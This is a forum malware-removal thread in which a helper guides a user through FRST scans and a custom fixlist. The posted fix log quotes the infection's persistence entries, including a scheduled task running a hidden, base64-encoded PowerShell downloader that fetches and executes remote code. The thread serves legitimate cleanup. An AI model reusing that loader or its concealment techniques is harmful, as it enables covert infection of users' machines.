    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Roboscan\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 15:49:14.547
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Roboscan\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 15:49:14.406
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 15:35:20.347
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 14:36:36.069
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 14:29:07.156
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


    ==================== Memory info ===========================

    Processor: Intel(R) Core(TM) i5-4210U CPU @ 1.70GHz
    Percentage of memory in use: 31%
    Total physical RAM: 6024.96 MB
    Available physical RAM: 4155.91 MB
    Total Virtual: 6984.96 MB
    Available Virtual: 4856.89 MB

    ==================== Drives ================================

    Drive c: (OS) (Fixed) (Total:920.08 GB) (Free:678.4 GB) NTFS
    Drive d: (TRAVELDRIVE) (Removable) (Total:7.2 GB) (Free:2.74 GB) FAT32
    Drive x: (WINRETOOLS) (Fixed) (Total:0.73 GB) (Free:0.29 GB) NTFS
    Drive y: (PBR Image) (Fixed) (Total:10.05 GB) (Free:0.71 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 931.5 GB) (Disk ID: 5AA0DE3C)

    Partition: GPT.

    ========================================================
    Disk: 1 (MBR Code: Windows XP) (Size: 7.2 GB) (Disk ID: BF9CEC9C)
    Partition 1: (Not Active) - (Size=7.2 GB) - (Type=0C)

    ==================== End of Addition.txt ============================
     
  9. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    [​IMG] Uninstall following unwanted programs:

    Pool Component
    Setup


    [​IMG] Download attached fixlist.txt file and save it to the Desktop.
    NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

    Run FRST(FRST64) and press the Fix button just once and wait.
    The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

    [​IMG] After restart see if you can connect.
     

    Attached Files:

  10. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Is it okay to keep the files on my usb drive or should I move them before the download?
     
  11. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    You should have all tools I ask you to use on your Desktop.
     
  12. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Okay I'll move them there, cause I'm using my PC for internet.
     
  13. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Fix result of Farbar Recovery Scan Tool (x64) Version:31-12-2015
    Ran by hersheychoco9 (2016-01-05 20:30:10) Run:1
    Running from D:\Utilities
    Loaded Profiles: hersheychoco9 (Available Profiles: hersheychoco9 & Administrator)
    Boot Mode: Normal
    ==============================================

    fixlist content:
    *****************
    () C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe
    C:\Users\hersheychoco9\AppData\Local\BrowserAir
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\Run: [ezvtum] => rundll32.exe "C:\Users\hersheychoco9\AppData\Local\ezvtum.dll",ezvtum <===== ATTENTION
    C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {4d6de65c-5455-11e4-825b-a0886955d281} - "D:\VZW_Software_upgrade_assistant.exe"
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {65359199-e247-11e4-828b-a0886955d281} - "D:\HTC_Sync_Manager_PC.exe"
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
    ProxyServer: [S-1-5-21-1030869394-3123877279-975090705-1001] => http=127.0.0.1:8800
    Winsock: Catalog9 01 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 02 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 03 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 04 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 16 C:\Windows\system32\Comvud.dll No File
    RemoveProxy:
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    SearchScopes: HKLM-x32 -> DefaultScope {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
    SearchScopes: HKU\S-1-5-21-1030869394-3123877279-975090705-1001 -> {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
    FF Homepage: user_pref("browser.startup.homepage","hxxp://www.only-search.com/?babsrc=HP_kms&affID=970000014");
    FF SelectedSearchEngineuser_pref("browser.search.selectedEngine","Search The Web (Only-Search)");: user_pref("browser.search.selectedEngine","Search The Web (Only-Search)");
    FF DefaultSearchEngineuser_pref("browser.search.defaultenginename","Search The Web (Only-Search)");: user_pref("browser.search.defaultenginename","Search The Web (Only-Search)");
    FF Keyword.URL: user_pref("keyword.URL","hxxp://www.only-search.com/?babsrc=KW_kms&affID=$afltId$&q=");
    FF NewTab: user_pref("browser.newtab.url","hxxp://www.only-search.com/?babsrc=NT_kms&affID=970000014");
    FF SearchPlugin: C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml [2015-12-28]
    C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml
    FF HKLM\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found
    FF HKLM-x32\...\Firefox\Extensions: [jid1-xNAj4KGyf5wyhg@jetpack] - C:\Program Files (x86)\Faster Web\faster-web.xpi => not found
    FF HKLM-x32\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found
    CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
    S2 NetprotAdp; no ImagePath
    S2 SushiLeadsUpdaterService; no ImagePath
    S2 Update Simple for You; no ImagePath
    S2 WajaNetEn Monitor; no ImagePath
    S3 WsDrvInst; no ImagePath
    S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X]
    S1 cherimoya; system32\drivers\cherimoya.sys [X]
    S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
    S3 iscFlash; \??\C:\Users\HERSHE~1\AppData\Local\Temp\7zS2B1B.tmp\iscflashx64.sys [X]
    S3 PCDSRVC{3B54B31B-D06B6431-06020200}_0; \??\c:\program files\dell\supportassist\pcdsrvc_x64.pkms [X]
    S3 X6va029; \??\C:\Windows\SysWOW64\Drivers\X6va029 [X]
    S1 {b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64; system32\drivers\{b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64.sys [X]
    2015-12-28 23:08 - 2015-12-28 23:09 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\BrowserAir
    2015-12-28 23:06 - 2015-12-29 16:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DailyPCClean
    2015-12-28 23:06 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files (x86)\DailyPCClean
    2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\Documents\DailyPCClean
    2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\DailyPCClean
    2014-10-10 07:45 - 2014-10-09 17:10 - 27674200 _____ () C:\Program Files (x86)\Roboscan_IS_Free.exe
    2015-05-01 20:00 - 2015-12-20 01:43 - 0000132 _____ () C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs
    2015-12-28 23:01 - 2015-12-28 23:02 - 0001282 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.boostrap.log
    2015-12-28 23:01 - 2015-12-28 23:02 - 0005761 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.installation.log
    2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\Selection Tools.installation.log
    2015-12-28 23:01 - 2015-12-28 23:01 - 0000097 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.boostrap.log
    2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.installation.log
    2015-12-28 22:57 - 2015-12-28 22:57 - 0009216 _____ () C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
    2015-04-08 10:52 - 2015-04-08 10:52 - 0002493 _____ () C:\Users\hersheychoco9\AppData\Local\recently-used.xbel
    2015-12-28 22:57 - 2015-12-28 22:57 - 0002560 _____ () C:\Users\hersheychoco9\AppData\Local\uninstall.exe
    2014-05-13 21:05 - 2014-05-13 21:05 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
    2015-12-28 23:16 - 2015-12-28 23:16 - 0001520 _____ () C:\ProgramData\tempimage.bmp
    Task: {12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27} - System32\Tasks\Pool Component => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll",#1 <==== ATTENTION
    C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll
    Task: {63B79E46-FBBD-4C8A-B7AA-45C6731402FF} - System32\Tasks\IBUpd2 => C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe [2015-12-22] ()
    Task: {75F57505-E997-49EF-8280-CBEDA94B26CE} - System32\Tasks\Seventh => C:\Users\hersheychoco9\AppData\Roaming\Seventh\Seventh.exe <==== ATTENTION
    C:\Users\hersheychoco9\AppData\Roaming\Seventh
    Task: {82DB69B4-7124-4705-AFC2-219F5EBB3241} - System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbwByAGEAbABsAHMAaABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9ADYATwBXAEQAegBmAFIAVwBLAEgALQBoAHYANAB1AC0ALQBEADQAUABHAEgAaQBwAF8ANQBWAEUATQBRAHAAegAwAEIASQA0AGwARwBPAHcAMgBuAGMAbQBsAEgAYgBqAGMASgBtAFIAUwBVAE4ATQBOAHcAdwAzAFkAUgBjAFQAWQBTAGwAdwBXAGEAbgBvAGcANgAyAEwAWQBPAEUAUAB1ADMANAA5AE0AaAB4AEsASABvAFcAVABPADkAWgBmAEMAawBJAHkAcQBHAFgAcgB6ADIAUABhAEIAMQBLAFcAaQBkAHYAQwBqAHQAXwBQAEEAOQBYAHEAVgAwAHoAZwAyAHUAVQBJAGcAUgBWAEMAcwByAHEANgA4AEkASAAyAEYAQgA4AGIAWgBUAE4AZgBZAFIAUQBqAHEAYgBHAGYANAB6AGwAOQBjAHUASwBsAEEANQBnAFAALQBnAFMATABKAE4AdQBKAEcAWQBFADkAQQBtAFoAMgBZAG0AWQBTADUAdwB0AEYAZAB1AF8ANABpADIANgBTAGMAQQBUAHcAawBLAFIAWgBKAHIAZABGAE8AWgBoADgARAA2AHkASABMAHQAeQBhAE4ANABBADUAdABqAG0AQQA2AHUAWgBiAGkAcgBmAEsAMgB6AHoAMQBiAEMAeABEAFIAbgA1AEwATgBXAEsANgBKAHEAVABOAFYAbAAzADUATwBwAEEAbwAzADEAaQBqAHEAcgBPAGkAawBPAHcAbgBvAFIATAB6AGQARgBuAE0AQQBrAG8ASQBPAGoATAB2AE8ASgBzADQAVAAtAHgATwA3AE8AZgBvAGwAQgBrAHgAVwB6AEIAWgBpAEMAOABMAFkAagBFADMARAB5AGMARQBIADEAWQAyADIAUwB4AEMAZQBiAHcANgBYAEMAUQAzAGMAWAB5AGIAXwBQAGQAYgAwAFoAUAA1ADEASABKAG4AdQBGAFcAagAwAHoAXwBwAFUAcABsAEQALQBLAFMAbQBoAFkAcQBrAEEAQwBzAEMAQwBZAFUALQBfAEIAYwBjAFkAbQB3AGEAbABuAHYARABRAEMAUABEAC0ARQBVADYARwBUAEUAbgBjAG8AcABmAFAAWQBXAEYAaQBEAG4AVABXADUAZABkAFgAcgA3AFgAcABzADYAQQBmAHkAeABBAFYAZwAwAFIAOQBzAGYAcwBZAHgANABnADkAdAAzAG0AawBrAEkAVQBOAEUAbwBBADEAQQBRADQARQBqAE4ATQAyADEASwBVAEcAUgBaAG8AMQBWAEEAMgBkAHUASABPADUAQwBjADAAOQBuADMAYgBxAHoARABrAG8AVQBIAGYANABxAEgARgBEADEAbQBVAG4ALQBuAEgATABqAG0AbQB6AEwAUwA5AEcATQBwAEEAUwBjAEcAVAB3AHYAaQA5AEwAVwBlADIASwBwADMAegB0AGgASABQAGwAdABiADYAdwBxAF8AdwBTAGsAdABkAFAAYwBTAEsAZAA3AGIAdwBEAGcAbwB0ADIAbAA4AE8AYQB4AFIAYwBWAEcAVwBDAFQAcQAyAGwAMQBwADUATwB4AEcAbgBCAFUATQAxAFIAdQBsAHgAWgBjADYAMQBZAFAARQBnAG4AMAB5AEkAYQB6AEkAVgB6AGYARwBNAC0AagBOAEQAUQBCAE0AdQB3AHAAMgBWAFEAQwB5AE4AOQBHAHoAawBtAG8AeQAyAE0AagAxAEEARABQAHkAYgBUAGwAawBxAFUATAB6AHAAQQBtAGgAZwBuAGwARQA2AFUAOQBWADQAdgB4ADIAUgBHAGoASwBfAFkAUAA4AEcAMwA0AFkANwBoAHcAUQBkAEIAVQBNAFMAQwAyAGYANAAwAGkAeQByAEYANABCADIAMgByAFoAWABoAFQAUgBCAHUAawBwAE0AQwBMAEsAaQBPAGkAagBRAG0AdwBTADMAQwBGAG4AcQBxADUAdAB4AFQAZwB3ADgARQBnAFkANwBUAFgAcwBlAG8AVQBKAHEAUQBtAHoATwBrADEATgBQAHAAVQBsADYAegBkAEUATABLAG8ATgByAHQAWABKAF8AOABtAGEASAAxAHIAMgBNAGEAagBLAFMAcgBJAGsAcQAxAGIANABPAEUAUwBXAHUAawA4AHUAMQBaAHEAQQAxAEwASQBKAHYAYQBqADAAYQBqAHIAVQBFAGYASgB6AGQAUwAtADcAXwB5AFcAMgBfAEgAUwBmAEUAWQB0AG8ANQAyAGQAXwA1AHEAYwBtAHMAegB4AFgAUgBkAFgAOABZAHYAOABIAFAAXwBjAFUALQBTADcAMQBSAEoAZgA0ADIANgA2AEwALQBBAHcAZQBEAE0AMQBrACYAYwA9ADcAaQBlAGgAMwB4AGsAcQB6AEwAUABwAG4AbABrAFoAZgBuAHEANABYADMAOQBoAE4AegAwAHcAdABfAE4AMABPADgAXwAtAHkAdgBDAHAAbwBpAHoANgBXAFcAOABGAEUAdQBvAEkASABZADcAawBqAGgAVgBsAGgASgAtAGwATAAyAHYAUwBtAFcAQQA1AFEAVgAyAG0AUgB5AFMAOABRAEIAeABuAFcAVwByADgAQQBmAGsAXwBXAEUAWQBaAHEASQBvAHkAcQAzAGwAZAByAFYAcQBVAEgAegBzAGgARwBHAHkAdgBsAEUAagA0ADEAMQBXAEoAegBYAFUAYgBDAGEAdgBVAFMAcwBhADUASwBEADMANQBjAHAAdwBBAFUAUgBnAHUAawAzAHIAdgBjAHgANQBJADgAeABSAFMANgBqAGYAZgBLAFcAbwBPADkARAA3ADcAagBfAFMAcwBYAGQAYwBfADUANgBDAEwAUwBZAFYAVwBFAGEAUwBFAFEAVgB4AGsAUABLAHoAUQBIAFkATgBJAHQAcAAzAGoAMABOAGMAUgBIAEEAcABTAEEAbwBwAE0AcwB4AHMASABDAHMAUQAtAFQAbQBjAFMAZQA0AHoAdgBOAFYAagBPAE0AdwA3AHMAdAAwAFAALQBqAEYATwBtAEgASwB4AFUALQBNAG8AdABxAFAASgBnAFgAXwBJADMAVgA2ADYAUwA4AEoAQgBxAEMAbAA1AEMASgB1AHkAYQBNADAAMABaAGIAaABEAEkAMQBfAHkAYgBaAEYASABoAGkAaQB2ADUAQgBuAGYAeABSAFUAYQBhAHQAawBhADEAZQBBAEsATwBfADUAcgBiADEATQBQAFcAdABPADQATABFAFoAbgBoAGgAVgBPADMAVwBmAE8AMQBVAHEANQBhAE0AVQB1AGQAUgBzADIAWABGAEoASgBxAFIATgBjADAAaABLAEwAMAA1AEcAcwBhAHkAcQA3AFEAbwBWAGMAMgBmAGoAMABaAC0AcQBWAG8AawBfADMAYgBGAFkAcgAyAHMAdwBnAHgAbwBiAHEAWgBRAGgAWgBRAG8AbQBWAHAANwA2AHYANgBkAHgAdgBBADIAaQA2AHgAWQBwADIAaQBVAE0AMwB2AFcAbAB2AEoATQBkADMARQBUAFEAOABLADkAYQBSAGoAOQBaADcASwBxAGcAdQBLAGcAawBsAEYAcgByAEsAMgB2AFIAVwB3ADAAUABoAEsASgBiADQAQQBiAG8AcAAyAGkATwBlAHoAdgBqAEMAbgAxAHIAOAA0AEcATwB0AFAARwAtADAATQBSAEYAdgBoAFgAZwBUAGEANQBxAEIATwBuAEYAbQBCAHEAcgBKAFoAaQBmADQAWAA2AFIAbgA1AFcAbQA3ADQAbABuAFIALQBtAGgAagBDAHQAaABGAGoAaQBUAE4AegBJAHkAcwBtADIAbwBHAFIAVgBfAG4AaAA3AGwANgBMAEcASABXAHAASQBUAEwAcABlAGkAUABVAFgAeQBjAGEAWgBCAGoAZQBoAFQAeQBUADIASgA3AHoASwBxAFoAYQBmAG4AMgBoADIASABKAGwAYwBjAFkAdwB3AGIAcQBPADgAUgA0AE4AbgBBAGkAVAB0AHgAWQBXAFYAXwBtAG4AMABXAHQAZQBvAG0ARgBzAEcAOQBBAGgAaQBWADEAVAA2AFcANQBEADgATABFAHkAQgBNAGkAegBnADYAdQBsAC0ARwAtAE4ARAB0AGUAaQAzAG4AZAAwAEMAXwBMAFYAMgBQAEYAcQAxAFoAMQBoAFEAbQBzAEEAOABVAEwAdQBiAF8ANwBiAHEASQBPAHIAeAB5AFkAWAB0AFIAMABwAHYAUQBvAFgAZAB3AFcAMQBKAHoAWABWAE0ASQBRAFkAMwA3AFYAeABDAHoAZAA0AHkAYQAyAHgAUwBhAHIAbgBhAEcAagBWAC0ASgA4AFcASgAyAEkAUQBLAF8AegBMAGEASAAtAFMASwBWAFoAMwBXAFEAbwA0ADIAZQBfAFQAOAB1ADcAcwBEAGQAcgBlAE0AMgBDAHMARwB6AE4ARABzAG8AcwBDAGEAOQBLADIAZwBpADgAVABKAEcAXwBPAHkAbgA1AHAAVABzADUAcwBlAHoAOQB5AFUASQBkAGcAVgBlAGUAZgA4AGsAQgA0ADEAcwBOADcAUQBtAE0ATABsAHcAegBXAHQATQByAGcAcABMAGUATgBLAHoAUABkADMAegA3AEsAQQBCADUAQgBIAFIASAB0AEsAMQByAFkAOAA3AHcAMQBlADUANgBMAFkAVQBaAHgAVwBjAEoAQwBNADAATAAzAFAAMwB0AFEAdQB0AFMAdwB5AFoAdwBMAGkALQBmAGsANgAxAFEAeAAwAGwAMwBWAFYAXwBUAE8AYgBWAGYAJgByAD0ANwA3ADEAOQA4ADcAOQA5ADMAMAAyADMANQA3ADEAMwAwADUAMQAiADsAJABzAHQAcwBrAD0AIgB7ADAARgAwAEYANwBEADQANwAtADcARQAwADgALQA3AEQAMABCAC0ANwA4ADEAMQAtADcARAAwAEMAMAA1ADAAQgAxADEAMABEAH0AIgA7ACQAcAByAGkAZAA9ACIAUwB5AHMAdABlAG0ASABlAGEAbABlAHIAIgA7ACQAaQBuAGkAZAA9ACIAWABRAFUATwAyAFkAVwBZACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
    Task: {86B9E75F-1889-49B5-B36A-35C70EC3D395} - System32\Tasks\Pool Component2 => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll",#1 <==== ATTENTION
    C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll
